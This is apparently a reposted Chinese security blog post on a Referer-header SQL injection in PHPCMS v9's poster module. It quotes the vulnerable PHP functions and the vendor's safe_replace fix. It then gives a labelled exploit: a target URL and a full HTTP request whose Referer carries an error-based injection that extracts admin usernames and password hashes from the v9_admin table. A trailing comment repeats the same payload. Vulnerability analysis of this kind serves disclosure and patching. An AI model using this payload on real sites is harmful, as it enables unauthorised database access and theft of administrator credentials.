PHPCMSv9 SQL注入(Rerferer注入)

from:http://huakai.paxmac.org/?p=522

360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。
上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。

public function poster_click() {
	$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
	$r = $this->db->get_one(array('id'=>$id));
	if (!is_array($r) && empty($r)) return false;
	$ip_area = pc_base::load_sys_class('ip_area');
	$ip = ip();
	$area = $ip_area->get($ip);
	$username = param::get_cookie('username') ? param::get_cookie('username') : '';
	if($id) {
		$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
		$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
	}
	$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
	$setting = string2array($r['setting']);
	if (count($setting)==1) {
		$url = $setting['1']['linkurl'];
	} else {
		$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
	}
	header('Location: '.$url);
}

在show_stat函数中同样出现了问题

protected function show_stat($siteid = 0, $spaceid = 0, $id = 0) {
		$M = new_html_special_chars(getcache('poster', 'commons'));
		if($M['enablehits']==0) return true;
		//$siteid = intval($siteid);
		$spaceid = intval($spaceid);
		$id = intval($id);
		if(!$id) return false;
		if(!$siteid || !$spaceid) {
			$r = $this->db->get_one(array('id'=>$id), 'siteid, spaceid');
			$siteid = $r['id'];
			$spaceid = $r['spaceid'];
		}
		$ip = ip();
		$ip_area = pc_base::load_sys_class('ip_area');
		$area = $ip_area->get($ip);
		$username = param::get_cookie('username') ? param::get_cookie('username') : '';
		$this->db->update(array('hits'=>'+=1'), array('id'=>$id));
		$this->s_db->insert(array('pid'=>$id, 'siteid'=>$siteid, 'spaceid'=>$spaceid, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=>0));
		return true;
	}
}

不过官方对这2个点都做了修复。
官方修复的方法:
safe_replace(HTTP_REFERER),对其进行了过滤。

function safe_replace($string) {
	$string = str_replace('%20','',$string);
	$string = str_replace('%27','',$string);
	$string = str_replace('%2527','',$string);
	$string = str_replace('*','',$string);
	$string = str_replace('"','"',$string);
	$string = str_replace("'",'',$string);
	$string = str_replace('"','',$string);
	$string = str_replace(';','',$string);
	$string = str_replace('<','&lt;',$string);
	$string = str_replace('>','&gt;',$string);
	$string = str_replace("{",'',$string);
	$string = str_replace('}','',$string);
	$string = str_replace('\\','',$string);
	return $string;
}

EXP:

http://www.0day5.com/index.php?m=poster&c=index&a=poster_click&id=1

Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

经过修改后的http head是这样的

Host: www.0day5.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: CNZZDATA2919850=cnzz_eid=97895523-1357654308-&ntime=1357654308&cnzz_a=0&retime=1357654307516&sin=&ltime=1357654307516&rtime=0
Referer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#

1 条评论

  1. [...] Rerferer注入: 访问http://www.0day5.com/index.php?m=poster&c=index&a=poster_click&id=1 添加Rerferer:http://www.0day5.com’,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)# 修改好的http头如下 [...]

发表评论